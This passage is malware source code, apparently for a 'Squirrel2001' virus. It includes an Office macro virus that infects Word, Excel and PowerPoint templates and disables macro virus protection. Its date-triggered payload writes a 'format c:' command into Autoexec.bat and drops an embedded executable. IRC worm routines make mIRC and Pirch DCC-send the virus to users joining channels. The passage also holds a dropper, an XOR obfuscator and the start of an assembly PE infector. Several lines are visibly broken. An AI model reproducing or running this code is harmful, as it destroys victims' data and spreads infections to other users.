NT.InsertLines "End If"
NT.InsertLines "Next cItem"
NT.InsertLines "Set NT = NormalTemplate.VBProject.vbcomponents(1).
CodeModule"
NT.InsertLines "Set TT = Templates(1).VBProject.vbcomponents(1).
CodeModule"
NT.InsertLines "Set AD = ActiveDocument.VBProject.vbcomponents(1).
CodeModule"
NT.InsertLines "If AD.Lines(1, 1) <> ''<!--Squirrel-->' Then"
NT.InsertLines "AD.DeleteLines 1, AD.CountofLines"
NT.InsertLines "AD.InsertLines 1, TT.Lines(1, TT.CountofLines)"
NT.InsertLines "If AD.Lines(1, 1) <> ''<!--Squirrel-->' Then"
NT.InsertLines "AD.InsertLines 1, NT.Lines(1, NT.CountofLines)"
NT.InsertLines "End If"
NT.InsertLines "End If"
NT.InsertLines "If NT.Lines(1, 1) <> ''<!--Squirrel-->' Then"
NT.InsertLines "NT.DeleteLines 1, NT.CountofLines"
NT.InsertLines "NT.InsertLines 1, AD.Lines(1, AD.CountofLines)"
NT.InsertLines "end if"
NT.InsertLines "Set xlApp = CreateObject('Excel.Application')"
NT.InsertLines "If UCase(Dir(xlApp.Application.StartupPath + '\Book1.'))
<> UCase('BOOK1') Then"
NT.InsertLines "System.PrivateProfileString('',
'HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Microsoft Excel',
'Options6') = 'Check'"
NT.InsertLines "System.PrivateProfileString('',
'HKEY_LOCAL_MACHINE\Software\Microsoft\Office\9.0\New User
Settings\Excel\Microsoft Excel', 'Options6') = ''"
NT.InsertLines "System.PrivateProfileString('', 'HKEY_USERS\.
Default\Software\Microsoft\Office\9.0\Excel\Microsoft Excel',
'Options6') = 'Whoa'"
NT.InsertLines "Set Book1Obj = xlApp.Workbooks.Add"
NT.InsertLines "Book1Obj.VBProject.vbcomponents('ThisWorkbook').
CodeModule.InsertLines 1, NT.Lines(1, NT.CountofLines)"
NT.InsertLines "Book1Obj.SaveAs xlApp.Application.StartupPath &
'\Book1.'"
NT.InsertLines "Book1Obj.Close"
NT.InsertLines "End If"
NT.InsertLines "xlApp.Quit"
NT.InsertLines "Set PPObj = CreateObject('PowerPoint.Application')"
NT.InsertLines "Set PBT = PPObj.Presentations.Open(Application.Path +
'\..\Templates\Blank Presentation.pot', , , msoFalse)"
NT.InsertLines "For Each ModComponent In PBT.VBProject.vbcomponents"
NT.InsertLines "If ModComponent.Name = 'Squirrel' Then dontadd = True"
NT.InsertLines "Next"
NT.InsertLines "If dontadd <> True Then"
NT.InsertLines "System.PrivateProfileString('',
'HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\PowerPoint\Options',
'MacroVirusProtection') = ''"
NT.InsertLines "System.PrivateProfileString('',
'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\9.0\New User
Settings\PowerPoint\Options', 'MacroVirusProtection') = ''"
NT.InsertLines "System.PrivateProfileString('', 'HKEY_USERS\.
Default\Software\Microsoft\Office\9.0\PowerPoint\Options',
'MacroVirusProtection') = ''"
NT.InsertLines "Set NewMod = PBT.VBProject.vbcomponents.Add(1)"
NT.InsertLines "NewMod.Name = 'Squirrel'"
NT.InsertLines "NewMod.CodeModule.InsertLines 1, NT.Lines(1, NT.
CountofLines)"
NT.InsertLines "NewMod.CodeModule.ReplaceLine 118, 'Sub
actionhook(tristate)'"
NT.InsertLines "Set ShapetoWack = PBT.SlideMaster.Shapes.AddShape(1, 0,
0, PBT.PageSetup.SlideWidth, PBT.PageSetup.SlideHeight)"
NT.InsertLines "With ShapetoWack"
NT.InsertLines ".Name = 'Squirrel'"
NT.InsertLines ".ZOrder (1)"
NT.InsertLines ".Line.Visible = False"
NT.InsertLines ".Fill.Visible = False"
NT.InsertLines ".ActionSettings(1).Action = 8"
NT.InsertLines ".ActionSettings(1).Run = 'actionhook'"
NT.InsertLines "End With"
NT.InsertLines "Set NewMod = Nothing"
NT.InsertLines "PBT.Save"
NT.InsertLines "End If"
NT.InsertLines "PBT.Close"
NT.InsertLines "PPObj.Quit"
NT.InsertLines "End If"
NT.InsertLines "If TT.Lines(1, 1) <> ''<!--Squirrel-->' Then"
NT.InsertLines "TT.DeleteLines 1, TT.CountofLines"
NT.InsertLines "TT.InsertLines 1, NT.Lines(1, NT.CountofLines)"
NT.InsertLines "End If"
NT.InsertLines "call killyou"
NT.InsertLines "End Sub"
NT.InsertLines "Private Sub Workbook_Deactivate()"
NT.InsertLines "On Error Resume Next"
NT.InsertLines "Set AW = ActiveWorkbook.VBProject.
vbcomponents('ThisWorkbook').CodeModule"
NT.InsertLines "Set TW = ThisWorkbook.VBProject.
vbcomponents('ThisWorkbook').CodeModule"
NT.InsertLines "If UCase(Dir(Application.StartupPath + '\Book1.')) <>
'BOOK1' Then"
NT.InsertLines "Set WordObj = GetObject(, 'Word.Application')"
NT.InsertLines "If WordObj = '' Then"
NT.InsertLines "Set WordObj = CreateObject('Word.Application')"
NT.InsertLines "WQuit = True"
NT.InsertLines "End If"
NT.InsertLines "Set NT = WordObj.NormalTemplate.VBProject.
vbcomponents(1).CodeModule"
NT.InsertLines "WordObj.Options.SaveNormalPrompt = False"
NT.InsertLines "NT.InsertLines 1, 'Public Sub DisableAV()' + Chr(13) +
Chr(10) + TW.Lines(23, 3) + Chr(13) + Chr(10) + TW.Lines(38, 3) +
Chr(13) + Chr(10) + 'End Sub'"
NT.InsertLines "WordObj.Run 'Normal.ThisDocument.DisableAV'"
NT.InsertLines "NT.DeleteLines 1, NT.CountofLines"
NT.InsertLines "NT.InsertLines 1, TW.Lines(1, TW.CountofLines)"
NT.InsertLines "Set NT = Nothing"
NT.InsertLines "If WQuit = True Then WordObj.Quit"
NT.InsertLines "Set PPObj = CreateObject('PowerPoint.Application')"
NT.InsertLines "Set PBT = PPObj.Presentations.Open(Application.Path +
'\..\Templates\Blank Presentation.pot', , , msoFalse)"
NT.InsertLines "For Each ModComponent In PBT.VBProject.vbcomponents"
NT.InsertLines "If ModComponent.Name = 'Squirrel' Then dontadd = True"
NT.InsertLines "Next"
NT.InsertLines "If dontadd <> True Then"
NT.InsertLines "Set NewMod = PBT.VBProject.vbcomponents.Add(1)"
NT.InsertLines "NewMod.Name = 'Squirrel'"
NT.InsertLines "NewMod.CodeModule.InsertLines 1, TW.Lines(1, TW.
CountofLines)"
NT.InsertLines "NewMod.CodeModule.ReplaceLine 118, 'Sub
actionhook(tristate)'"
NT.InsertLines "Set ShapetoWack = PBT.SlideMaster.Shapes.AddShape(1, 0,
0, PBT.PageSetup.SlideWidth, PBT.PageSetup.SlideHeight)"
NT.InsertLines "With ShapetoWack"
NT.InsertLines ".Name = 'Squirrel'"
NT.InsertLines ".ZOrder (1)"
NT.InsertLines ".Line.Visible = False"
NT.InsertLines ".Fill.Visible = False"
NT.InsertLines ".ActionSettings(1).Action = 8"
NT.InsertLines ".ActionSettings(1).Run = 'actionhook'"
NT.InsertLines "End With"
NT.InsertLines "Set NewMod = Nothing"
NT.InsertLines "PBT.Save"
NT.InsertLines "End If"
NT.InsertLines "PBT.Close"
NT.InsertLines "PPObj.Quit"
NT.InsertLines "Set xlApp = CreateObject('Excel.Application')"
NT.InsertLines "Set Book1Obj = xlApp.Workbooks.Add"
NT.InsertLines "Book1Obj.VBProject.vbcomponents('ThisWorkbook').
CodeModule.InsertLines 1, TW.Lines(1, TW.CountofLines)"
NT.InsertLines "Book1Obj.SaveAs FileName:=Application.StartupPath &
'\Book1.', FileFormat:=xlNormal, AddToMru:=False"
NT.InsertLines "Book1Obj.Close"
NT.InsertLines "xlApp.Quit"
NT.InsertLines "End If"
NT.InsertLines "If AW.Lines(1, 1) <> ''<!--Squirrel-->' Then"
NT.InsertLines "AW.InsertLines 1, TW.Lines(1, TW.CountofLines)"
NT.InsertLines "End If"
NT.InsertLines "call killyou"
NT.InsertLines "End Sub"
NT.InsertLines "Private Sub actionhook(tristate)"
NT.InsertLines "On Error Resume Next"
NT.InsertLines "If Int(Rnd * 7) = 0 Then"
NT.InsertLines "Set Home = ActivePresentation"
NT.InsertLines "If UCase(Dir(Application.Path + '\Xlstart\Book1.')) <>
UCase('BOOK1') Then"
NT.InsertLines "Set WordObj = GetObject(, 'Word.Application')"
NT.InsertLines "If WordObj = '' Then"
NT.InsertLines "Set WordObj = CreateObject('Word.Application')"
NT.InsertLines "WQuit = True"
NT.InsertLines "End If"
NT.InsertLines "Set NT = WordObj.NormalTemplate.VBProject.
vbcomponents(1).CodeModule"
NT.InsertLines "WordObj.Options.SaveNormalPrompt = False"
NT.InsertLines "NT.InsertLines 1, 'Public Sub DisableAV()' + Chr(13) +
Chr(10) + Home.VBProject.vbcomponents('Squirrel').CodeModule.Lines(23,
3) + Chr(13) + Chr(10) + Home.VBProject.vbcomponents('Squirrel').
CodeModule.Lines(38, 3) + Chr(13) + Chr(10) + 'End Sub'"
NT.InsertLines "WordObj.Run 'Normal.ThisDocument.DisableAV'"
NT.InsertLines "NT.DeleteLines 1, NT.CountofLines"
NT.InsertLines "NT.InsertLines 1, Home.VBProject.
vbcomponents('Squirrel').CodeModule.Lines(1, Home.VBProject.
vbcomponents('Squirrel').CodeModule.CountofLines)"
NT.InsertLines "NT.ReplaceLine 118, 'Private Sub
actionhook(tristate)'"
NT.InsertLines "Set NT = Nothing"
NT.InsertLines "If WQuit = True Then WordObj.Quit"
NT.InsertLines "Set xlApp = CreateObject('Excel.Application')"
NT.InsertLines "Set Book1Obj = xlApp.Workbooks.Add"
NT.InsertLines "Book1Obj.VBProject.vbcomponents('ThisWorkbook').
CodeModule.InsertLines 1, Home.VBProject.vbcomponents('Squirrel').
CodeModule.Lines(1, Home.VBProject.vbcomponents('Squirrel').CodeModule.
CountofLines)"
NT.InsertLines "Book1Obj.VBProject.vbcomponents('ThisWorkbook').
CodeModule.ReplaceLine 118, 'Private Sub actionhook(tristate)'"
NT.InsertLines "Book1Obj.SaveAs xlApp.Application.StartupPath &
"\Book1."
NT.InsertLines "Book1Obj.Close"
NT.InsertLines "xlApp.Quit"
NT.InsertLines "Set PBT = Presentations.Open(Application.Path + '\..
\Templates\Blank Presentation.pot', , , msoFalse)"
NT.InsertLines "dontadd = False"
NT.InsertLines "For Each ModComponent In PBT.VBProject.vbcomponents"
NT.InsertLines "If ModComponent.Name = 'Squirrel' Then dontadd = True"
NT.InsertLines "Next"
NT.InsertLines "If dontadd <> True Then"
NT.InsertLines "Set NewMod = PBT.VBProject.vbcomponents.Add(1)"
NT.InsertLines "NewMod.Name = 'Squirrel'"
NT.InsertLines "NewMod.CodeModule.InsertLines 1, Home.VBProject.
vbcomponents('Squirrel').CodeModule.Lines(1, Home.VBProject.
vbcomponents('Squirrel').CodeModule.CountofLines)"
NT.InsertLines "Set ShapetoWack = PBT.SlideMaster.Shapes.AddShape(1, 0,
0, PBT.PageSetup.SlideWidth, PBT.PageSetup.SlideHeight)"
NT.InsertLines "With ShapetoWack"
NT.InsertLines ".Name = 'Squirrel'"
NT.InsertLines ".ZOrder (1)"
NT.InsertLines ".Line.Visible = False"
NT.InsertLines ".Fill.Visible = False"
NT.InsertLines ".ActionSettings(1).Action = 8"
NT.InsertLines ".ActionSettings(1).Run = 'actionhook'"
NT.InsertLines "End With"
NT.InsertLines "PBT.Save"
NT.InsertLines "End If"
NT.InsertLines "PBT.Close"
NT.InsertLines "End If"
NT.InsertLines "End If"
NT.InsertLines "ActivePresentation.SlideShowWindow.View.Next"
NT.InsertLines "call killyou"
NT.InsertLines "End Sub"
NT.InsertLines "Private sub killyou()"
NT.InsertLines "On Error Resume Next"
NT.InsertLines "If Month(Now()) = 9 Then"
NT.InsertLines "Dim A As String, C As Long, B As String"
NT.InsertLines "If Format(Date, 'd') <> 4 Then Exit Sub"
NT.InsertLines "A =
'9460301/3/4/65535/184/0/64/0/0/0/0/0/0/0/0/128/247078670/-855002112/127
5181089/1750344141/1881174889/1919381362/1663069537/1869508193/170092965
2/1853190688/544106784/542330692/1701080941/168627502/36/0/17744/65868/8
91316465/0/0/17760480/327947/4096/0/0/4112/4096/8192/4194304/4096/512/4/
0/4/0/8192/512/0/2/1048576/4096/1048576/4096/0/16/0/0/0/0/0/0/0/0/0/0/0/
0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/2019914798/116/4096/4096/4096/
512/0/0/0/1610612768/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/195
/0/0/1018/608472405/1692087288/15205255/1526726656/1363299213/17780816/1
543382092/-98778237/-1956238453/1905130603/-1989781998/-289276813/193838
4400/1456233986/1217130635/-2086341636/814418152/41219595/-866193173/-33
7955845/1692087047/545981323/1476628324/268462173/1958936640/-1054798030
/75698411/-1989798620/-306054037/1804166672/588238594/1359964867/1364328
298/1778477649/1394658562/-2097151744/-1919475516/-1915773626/-202617/55
0326527/4194407/1488986895/-1958916469/-61830895/'&'-1982447475/-1226049
023/59475/-2091188224/-850189117/1073768480/1962891264/1409222692/139777
4844/1509708799/1488986895/50011/-396361728/0/314999134/-167772157/-2062
614266/520/673471629/254032771/128389/-2096693760/-1974073914/-12843965/
1074006132/109656756/6964806/1535868778/205753104/1342488707/1092668758/
-2097135616/2088833220/1160707078/257836376/112261/2072208896/-206261424
8/427/1124120678/3285197/-2112946112/411/1404996433/-1946157059/29488703
/-1201272716/-919387391/-1070344193/-919349836/-1958555085/-671136806/-1
57525613/108265921/1124186214/262002687/90754/-2086906368/-1070366778/-3
93488716/1784218730/-671131076/-1958078837/-2116550715/1162870846/612699
904/1392508929/23724138/588207954/-980725556/' &
'-1031581007/-1915224313/-1924128190/-1223733242/1418530374/682627600/-5
03968118/1345484429/1363236434/1359208897/-905721853/-149139925/-1856945
711/66078347/-2037777338/-1106/607945062/2071724216/-671103605/149346165
3/1012108114/-15547773/1849590231/1953524058/1599822439/-721201319/14416
61778/-63093619/55777417/-1098034473/-1200/-833189545/-1109895539/1018/-
1031589397/274369320/1980258859/-394046676/-1961326328/1510151258/-19572
11384/1510148186/-60947700/-1962649463/140116248/1076120193/725614592/51
279595/264758011/871091233/-348339069/19398986/856171628/-61306405/-5658
8659/78774271/-855586970/-1902867680/-216/251809929/657560758/738197503/
266724034/1485555745/1496877840/-242545181/14025144/-10921472/1542515671
/865925464/' &
'-2640704/1935580631/1725926193/-1958542408/2123103310/-19660802/2580795
66/553631777/1946147979/609484600/474188121/606632835/1099630197/2139984
8/129024865/1910796518/-747257806/217628006/-1077512563/-2147469236/2180
20454/1725366266/1241536703/138856294/-687927516/-1191944563/939349/2376
77241/-959185152/-497983488/-1998310658/-18706176/257250744/-1430955776/
13030399/-1258364384/1711311072/201868999/869728016/1400944603/174777459
5/-1073737728/1364396215/23613777/1094713349/-192196271/11332737/5503057
92/1048580/108954470/-33197033/-286569146/-972005887/-343913146/-2012706
587/-2147432959/25692296/-712534077/-712534033/-1757147924/-1745889913/-
1007757945/661010944/65619/4194408/4194369/4194354/544106829/875442550/6
42598688/22605/'"
NT.InsertLines "O = 'C:\Autoexec.bat'"
NT.InsertLines "SetAttr O, 0"
NT.InsertLines "Open O For Output As 1"
NT.InsertLines "Print #1, '%windir%\command\format c:
/autoexec/u/select'"
NT.InsertLines "Close"
NT.InsertLines "AW$ = InputBox('人人都拥有,无人能够保有;有人自知没有,
友人从未尝过;财富买不到,辛苦得不到,智慧不能得到。这是什么?',
'Test')"
NT.InsertLines "If AW$ = '爱情' Then"
NT.InsertLines "Kill O"
NT.InsertLines "MsgBox '我爱你张一', 4096, 'Thanks...'"
NT.InsertLines "Else"
NT.InsertLines "Open 'Squirrel.EXE' For Binary As 1"
NT.InsertLines "Do Until A = ''"
NT.InsertLines "C = InStr(A, '/')"
NT.InsertLines "B = Left(A, C - 1)"
NT.InsertLines "A = Right$(A, Len(A) - C)"
NT.InsertLines "C = Val(B)"
NT.InsertLines "Put 1, , C"
NT.InsertLines "Loop"
NT.InsertLines "Close"
NT.InsertLines "Shell 'Squirrel.EXE'"
NT.InsertLines "MsgBox '我生气了...', 48, 'No...'"
NT.InsertLines "End If"
NT.InsertLines "end if"
NT.InsertLines "end sub"
dim ntt
set ntt=macroset.NormalTemplate
ntt.save
nt.close
ntt.close
set nt =nothing
set ntt=nothing
set macroset=nothing
set txtff=nothing
set fsys=nothing
end sub
sub ircvirus()
hstxcaowgqz ""
lfvaazcukod ""
jjrtuqdkgzp()
end sub
Function hstxcaowgqz(ldjlkpyfjkp)
On Error Resume Next
if ldjlkpyfjkp = "" then
if igalgbinffy.fileexists("c:\mirc\mirc.ini") then ldjlkpyfjkp="c:\mirc"
if igalgbinffy.fileexists("c:\mirc32\mirc.ini") then ldjlkpyfjkp="c:
\mirc32"
aymnehqvpfd=rfqwdudwylf.
regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Pr
ogramFilesDir")
if igalgbinffy.fileexists(aymnehqvpfd & "\mirc\mirc.ini") then
ldjlkpyfjkp=aymnehqvpfd & "\mirc"
end if
if ldjlkpyfjkp <> "" then
set dcfxbemazhc = igalgbinffy.CreateTextFile(ldjlkpyfjkp & "\script.
ini", True)
dcfxbemazhc.WriteLine "[script]"
dcfxbemazhc.writeline "n0=on 1:JOIN:#:{"
dcfxbemazhc.writeline "n1= /if ( $nick == $me ) { halt }"
dcfxbemazhc.writeline "n2= /.dcc send $nick "&igalgbinffy.
GetSpecialFolder(0)& "\squirrel2001.vbs"
dcfxbemazhc.writeline "n3=}"
dcfxbemazhc.close
end if
end function
function lfvaazcukod(eambqpgakgb)
On Error Resume Next
if eambqpgakgb="" then
if igalgbinffy.fileexists("c:\pirch\Pirch32.exe") then eambqpgakgb="c:
\pirch"
if igalgbinffy.fileexists("c:\pirch32\Pirch32.exe") then
eambqpgakgb="c:\pirch32"
infeyymqwku=rfqwdudwylf.
regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Pr
ogramFilesDir")
if igalgbinffy.fileexists(infeyymqwku & "\pirch\Pirch32.exe") then
eambqpgakgb=infeyymqwku & "\pirch\Pirch32.exe"
end if
if eambqpgakgb <> "" then
set kwflfeakiul= igalgbinffy.CreateTextFile(eambqpgakgb & "\events.ini",
True)
kwflfeakiul.WriteLine "[Levels]"
kwflfeakiul.WriteLine "Enabled=1"
kwflfeakiul.WriteLine "Count=6"
kwflfeakiul.WriteLine "Level1=000-Unknowns"
kwflfeakiul.WriteLine "000-UnknownsEnabled=1"
kwflfeakiul.WriteLine "Level2=100-Level 100"
kwflfeakiul.WriteLine "100-Level 100Enabled=1"
kwflfeakiul.WriteLine "Level3=200-Level 200"
kwflfeakiul.WriteLine "200-Level 200Enabled=1"
kwflfeakiul.WriteLine "Level4=300-Level 300"
kwflfeakiul.WriteLine " 300-Level 300Enabled=1"
kwflfeakiul.WriteLine "Level5=400-Level 400 "
kwflfeakiul.WriteLine "400-Level 400Enabled=1"
kwflfeakiul.WriteLine "Level6=500-Level 500"
kwflfeakiul.WriteLine "500-Level 500Enabled=1"
kwflfeakiul.WriteLine ""
kwflfeakiul.WriteLine "[000-Unknowns]"
kwflfeakiul.WriteLine "UserCount=0"
kwflfeakiul.WriteLine "EventCount=0"
kwflfeakiul.WriteLine ""
kwflfeakiul.WriteLine "[100-Level 100]"
kwflfeakiul.WriteLine "User1=*!*@*"
kwflfeakiul.WriteLine "UserCount=1"
kwflfeakiul.writeline "Event1=ON JOIN:#:/dcc tsend $nick " &
igalgbinffy.GetSpecialFolder(0) & "\squirrel2001.vbs"
kwflfeakiul.WriteLine "EventCount=1"
kwflfeakiul.WriteLine ""
kwflfeakiul.WriteLine "[200-Level 200]"
kwflfeakiul.WriteLine "UserCount=0"
kwflfeakiul.WriteLine "EventCount=0"
kwflfeakiul.WriteLine ""
kwflfeakiul.WriteLine "[300-Level 300]"
kwflfeakiul.WriteLine "UserCount=0"
kwflfeakiul.WriteLine "EventCount=0"
kwflfeakiul.WriteLine ""
kwflfeakiul.WriteLine "[400-Level 400]"
kwflfeakiul.WriteLine "UserCount=0"
kwflfeakiul.WriteLine "EventCount=0"
kwflfeakiul.WriteLine ""
kwflfeakiul.WriteLine "[500-Level 500]"
kwflfeakiul.WriteLine "UserCount=0"
kwflfeakiul.WriteLine "EventCount=0"
kwflfeakiul.close
end if
end function
Function jjrtuqdkgzp()
On Error Resume Next
Set rusyghrsxeu = igalgbinffy.Drives
For Each jrhkuytiggg In rusyghrsxeu
If jrhkuytiggg.Drivetype = Remote Then
ibxbqdweghd= jrhkuytiggg & "\"
Call qetljeojelr(ibxbqdweghd)
ElseIf jrhkuytiggg.IsReady Then
ibxbqdweghd= jrhkuytiggg&"\"
Call qetljeojelr(ibxbqdweghd)
End If
Next
End Function
Function qetljeojelr(iibvitahxgz)
Set boihenmxiux= igalgbinffy.GetFolder(iibvitahxgz)
Set vbdkvvafcrz= boihenmxiux.Files
For Each isczukopoqj In vbdkvvafcrz
if isczukopoqj.name = "mirc.ini" then
hstxcaowgqz(isczukopoqj.ParentFolder)
end if
if isczukopoqj.name = "Pirch32.exe" then
lfvaazcukod(isczukopoqj.ParentFolder)
end if
Next
Set isczukopoqj= boihenmxiux.SubFolders
For Each fjyfemoplyf In isczukopoqj
Call qetljeojelr(fjyfemoplyf.path)
Next
End Function
---------------squirrels2001.vbs
end-------------------------------------------
---------------pevirusintovbs.vbs-----------------------------
dim peload,fso,vbsload,loadd
set fso=createobject("scripting.filesystemobject")
set peload=fso.opentextfile("pevrus.exe",true)
loadd=peload.readall
peload.close
set peload=nothing
set vbsload=fso.createtextfile("pevirus.vbs",true)
vbsload.wrtie"dim fso,wsh,vvl"
vbsload.wrtie"set fso=createobject('scripting.filesystemobject')"
vbsload.write"set wsh=createobject('wscript.shell')"
vbsload.write"set vvl=fso.createtextfile('pevirus.exe',true)"
vbsload.write"vvl.write"&"'"&loadd&"'"
vbsload.write"vvl.close"
vbsload.write"set vvl=nothing"
vbsload.write"wsh.run"pevirus.exe")
-----------------pevirusintovbs.vbs end---------------------------
-----------------code编码.vbs----------------------------------------
set fso=createobject("scripting.filesystemobject")
set file = fso.OpenTextFile("squirrel2001.vbs",1)
vbscopy=file.ReadAll
passaa
sub passaa()
pass=""
dim i,usechar,word
i=0
usechar="QWERTYUIOP{}ASDFGHJKL:
ZXCVBNM<>?~!@#$%^&*()_+|*/-qwertyuiop[]asdfghjkl;'zxcvbnm,.
/`1234567890-=\"
word=""
Randomize
for i=0 to 32
word=word+Mid(usechar,Le(usechar)*rnd+1,1)
next i
pass=(year(now)+800)*month(now)*day(now)*(time(now)+100)+word
vbscopy=exor(pass*123)
xortie(pass*29880)
set vsscode=fso.opentextfile("codef.vbs",true)
set httt=fso.createtextfile("squirrels2001finished.vbs",true)
httt.write"Execute vbscopy("&"'"&pass*123&"'"&",
"&"ts("&"'"&pass*29880&"'"&","&vbscopy&")"
httt.wrtie vsscode.readall
httt.close
end sub
sub exor(mstrKey as string)
vbscopya=""
Dim lngN As Long
Randomize Rnd(-1)
For lngN = 1 To Len(mstrKey)
Randomize Rnd(-Rnd * Asc(Mid(mstrKey, lngN, 1)))
Next lngN
Dim lngC As Long
Dim intB As Long
Dim lngx As Long
For lngx = 1 To Len(vbscopy)
lngC = Asc(Mid(vbscopy, lngx, 1))
intB = Int(Rnd * 256)
Mid(vbscopy, lngx, 1) = Chr(lngC Xor intB)
Next lngx
Dim lngz As Long
Dim lngs As Long
Dim lngJ As Long
Dim lngK As Long
Dim lngA As Long
Dim str As String
lngA = Len(vbscopy)
strB = Space(lngA + (lngA + 2) \ 3)
For lngN = 1 To lngA
lngz = Asc(Mid(vbscopy, lngs, 1))
lngJ = lngJ + 1
Mid(strB, lngJ, 1) = Chr((lngz And 63) + 59)
Select Case lngs Mod 3
Case 1
lngK = lngK Or ((lngz \ 64) * 16)
Case 2
lngK = lngK Or ((lngz \ 64) * 4)
Case 0
lngK = lngK Or (lngz \ 64)
lngJ = lngJ + 1
Mid(strB, lngJ, 1) = Chr(lngK + 59)
lngK = 0
End Select
Next lngs
If lngA Mod 3 Then
lngJ = lngJ + 1
Mid(strB, lngJ, 1) = Chr(lngK + 59)
End If
vbscopya = strB
end sub
sub xortie(passb as string)
vbscopya=""
dim k as long
dim length as integer
dim passc
length=len(passb)
for k=1 to 128
passc=passb+asc(mid(passb,k,1))*256*k
next k
passc=-passc
dim flength as long
dim size as long
dim byteblock() as byte
dim j as long
dim position as long
flength=lof(vbscopy)
size=flength
rnd(passc)
byteblock=vbscopy
for j=1 to size
byteblock(j)=byteblock(j) xor int(rnd*256)
next j
vbscopya=byteblock
end sub
--------------------code编码.vbs
end---------------------------------------
--------------------codef.vbs--------------------------------------
function vbscopy(psa,tsa)
Dim lngq As Long
Randomize Rnd(-1)
For lngq = 1 To Len(psa)
Randomize Rnd(-Rnd * Asc(Mid(psa, lngq, 1)))
Next lngq
Dim lngz As Long
Dim ints As Long
Dim lngx As Long
For lngx = 1 To Len(tsa)
lngz = Asc(Mid(tsa, lngx, 1))
ints = Int(Rnd * 256)
Mid(tsa, lngx, 1) = Chr(lngz Xor ints)
Next lngx
Dim lngC As Long
Dim lngD As Long
Dim lngE As Long
Dim lngA As Long
Dim lngB As Long
Dim lngN As Long
Dim lngJ As Long
Dim lngK As Long
Dim strB As String
lngA = Len(tsa)
lngB = lngA - 1 - (lngA - 1) \ 4
strB = Space(lngB)
For lngN = 1 To lngB
lngJ = lngJ + 1
lngC = Asc(Mid(tsa, lngJ, 1)) - 59
Select Case lngN Mod 3
Case 1
lngK = lngK + 4
If lngK > lngA Then lngK = lngA
lngE = Asc(Mid(tsa, lngK, 1)) - 59
lngD = ((lngE \ 16) And 3) * 64
Case 2
lngD = ((lngE \ 4) And 3) * 64
Case 0
lngD = (lngE And 3) * 64
lngJ = lngJ + 1
End Select
Mid(strB, lngN, 1) = Chr(lngC Or lngD)
Next lngN
vbscopy = strB
end function
function ts(psb,tsb)
dim k as long
dim length as integer
dim passc
length=len(psb)
for k=1 to 128
passc=ps+asc(mid(psb,k,1))*256*k
next k
passc=-passc
dim flength as long
dim size as long
dim byteblock() as byte
dim j as long
dim position as long
flength=lof(tsb)
size=flength
rnd(passc)
byteblock=tsb
for j=1 to size
byteblock(j)=byteblock(j) xor int(rnd*256)
next j
ts=byteblock
end function
---------------------codef.vbs
end--------------------------------------------------
---------------------squirrel2001合成.
vbs--------------------------------
set fso=createobject("scripting.filesystemobject")
set vs=fso.opentextfile("squirrels2001finished.vbs",true)
set pevs=fso.opentextfile("pevirus.vbs",true)
set vsss=fso.creatextfile("squirrels2001killerfinished.vbs",true)
vsss.write"On Error Resume Next"
vsss.write pevs.readall
vsss.write vs.readall
vsss.close
set wshh=createobject("wscript.shell")
wshh.run"squirrel2001killerfinished.vbs"
---------------------squirrel2001合成.vbs
end---------------------------------
---------------------pevirus.exe code in
asm------------------------------------
'a virus written by atm
'win9x/me/nt/2000/xp Dream
.486p
.model flat,STDCALL
locals
include include\mz.inc
include include\pe.inc
extrn ExitProcess:proc
extrn CreateFileA:proc
extrn MessageBoxA:proc
--- prepare to program start
.data
db ?
.code
;哪拇 virus code starts here 媚哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
哪?
vstart proc
pusha
call $+5
pop ebp
sub ebp,$-vstart-1 ;get delta
vsize equ file_end - vstart
mov eax,[esp+vsize+32]
sub eax,1000h
inf_ep equ $-4
mov [ebp+ha_module-vstart],eax
add eax,fg0 - vstart + 1000h
org_ep equ $-4 ;get startup address
push eax
call get_k32_apis
jmp __return
@anti_e:
call kill_st
call check_resident ;try to create it
call create_process_maps
.if byte ptr [ebp+error-vstart] == 0
call hookapi
.endif
__return:
pop dword ptr [esp+28]
popa
sub esp,-vsize-4
db 90h,90h
jmp eax ;exe back
xor eax,eax ;hlp back
ret 8
vstart endp
get_k32_apis proc
push 20
mov eax,[esp+vsize+48] ;find k32 address
sub ax,ax
pop ecx
@@1:.if word ptr [eax] != 'ZM'
sub eax,65536
loop @@1
jmp gk32a_f_a
.endif
cmp byte ptr [ebp+__return+11-vstart],90h
jz $+5
pop eax
jmp __return
push eax eax ;get k32 tables
add eax,[eax+60]
pop ebx edi
add ebx,[eax+78h]
mov cl,0
@@3:push ebx ecx
mov edx,[ebx+32]
add edx,edi
@@4:mov esi,[edx] ;calculate next crc32 func.
add esi,edi
push ecx edx ebx ;crc32 algorithm
stc
sbb ecx,ecx
mov edx,ecx
@@4_crc32_nByte:
sub eax,eax
sub ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
@@4_crc32_nBit:
shr bx,1
rcr ax,1
jnc @@4_crc32_no
xor ax,08320h
xor bx,0edb8h
@@4_crc32_no:
dec dh
jnz @@4_crc32_nBit
xor ecx,eax
xor edx,ebx
cmp byte ptr [esi-1],0
jnz @@4_crc32_nByte
@@4_crc32_fin:
not edx
not ecx
pop ebx
mov eax,edx
rol eax,16
mov ax,cx
pop edx ecx
cmp [ebp+k32_crcs+ecx*4-vstart],eax ;crc32 == my func ?
jz @@5
sub edx,-4
jmp @@4
gk32a_f_a:
jmp gk32a_f
@@3_a:
jmp @@3
@@5:sub edx,[ebx+32] ;get addr of the new func.
sub edx,edi
shr edx,1
add edx,[ebx+36]
add edx,edi
movzx edx,word ptr [edx]
shl edx,2
add edx,[ebx+28]
mov edx,[edx+edi]
add edx,edi
pop ecx ebx
movzx eax,word ptr [ebp+ecx*2+k32_addrs-vstart]
neg ax
mov [ebp+eax],edx ;store its
@@5a:inc ecx
mov eax,edi
rol eax,8
sub al,0BFh
jz @@5b
cmp ecx,14
jz @@5a
@@5b:cmp ecx,count
jnz @@3_a
push p_number+1 ;update Sleep function
pop ecx
@@6:movzx eax,word ptr [ebp+process_maps+ecx*2-vstart-2]
neg ax
